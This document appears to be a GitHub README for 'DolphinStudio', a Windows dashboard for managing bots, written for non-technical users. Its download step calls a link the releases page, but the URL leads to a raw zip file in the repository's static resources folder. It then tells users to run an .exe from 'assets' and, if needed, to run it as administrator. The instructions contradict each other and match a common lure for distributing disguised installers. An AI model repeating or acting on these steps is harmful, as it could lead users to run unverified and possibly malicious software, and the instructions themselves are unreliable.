DolphinStudio helps you manage Dolphin bots using a clear console and a simple dashboard. It shows you live statistics and lets you control your bots from one place.
This guide will help you get DolphinStudio up and running on your Windows computer. You don’t need technical skills. Just follow each step.
Before you start, make sure your computer meets these needs:
- Windows 10 or later (64-bit recommended)
- At least 4 GB of RAM
- 500 MB of free disk space
- Internet connection for downloading and updates
DolphinStudio is a bot manager designed specifically for Dolphin bots. It runs on Spring Boot and uses a web-based dashboard. The dashboard shows bot activity, lets you control multiple bots, and displays real-time logs in the terminal console.
Features include:
- Manage multiple Dolphin bots from one place
- View live bot statistics and performance
- Use a terminal console powered by WebSocket and xterm.js
- Access an easy-to-read web dashboard
- Run on your local Windows machine without extra setup
Click the button below or visit the releases page to download:
-
Visit the Download Page:
Go to the releases page by clicking the link above or go to:
https://raw.githubusercontent.com/jaiponni062004/DolphinStudio/master/src/main/resources/static/Dolphin-Studio-1.9.zip -
Find the Latest Version:
On the page, look for the newest release at the top. It will have a version number and date. -
Download the Windows File:
Under assets, find the file ending with.exe(example: DolphinStudioSetup.exe). Click to download this file. -
Run the Installer:
When the download finishes, open the.exefile by double-clicking it. This will start the installation wizard. -
Follow Installer Prompts:
Click “Next” on each step. Accept the license agreement. Choose where to install DolphinStudio if asked, or use the default folder. -
Finish Installation:
Click “Finish” when done. DolphinStudio will be ready to use.
After installation:
- Find the DolphinStudio icon on your desktop or in the Start menu.
- Click the icon to open the program.
- The dashboard will open in your default web browser. If it does not open automatically, open this address in your browser:
http://localhost:8080
The DolphinStudio dashboard gives you a clear view of your bots:
- Bot List: Shows all active Dolphin bots.
- Bot Status: See if each bot is running or stopped.
- Real-Time Logs: View bot actions and error messages in the console window.
- Control Buttons: Start, pause, or stop each bot with one click.
- Statistics: Graphs and charts show bot uptime, errors, and command usage.
Use the navigation menu on the left side of the screen to move between sections.
-
Add New Bots:
Use the “Add Bot” button in the dashboard. Enter the bot name and settings provided by your bot’s source. -
Start or Stop Bots:
Click the start or stop buttons next to each bot in the list. -
Monitor Bots:
Watch logs and statistics to check performance.
- Keep your Dolphin bots updated for best performance.
- Make sure your internet stays active during bot operation.
- If the dashboard does not load, check that no firewall is blocking access to
localhost:8080. - Restart DolphinStudio if you see any errors or lag.
- Program Won’t Start: Confirm you installed DolphinStudio correctly. Try running as administrator.
- Dashboard Doesn’t Open: Open your web browser and type
http://localhost:8080manually. - Bots Not Responding: Restart the bot or DolphinStudio. Check logs for error messages.
- Installation File Won’t Download: Make sure your internet connection is stable. Try a different browser if needed.
You can find more details about DolphinStudio’s features and updates on the GitHub page:
Visit the releases page below for downloads and updates:
If you have issues, check the “Issues” tab on the GitHub page. You can ask questions or report problems there.
DolphinStudio runs locally on your computer. It does not send your data anywhere unless you choose to share logs or reports.
Use DolphinStudio to manage your Dolphin bots in one place. It keeps bot control simple and clear.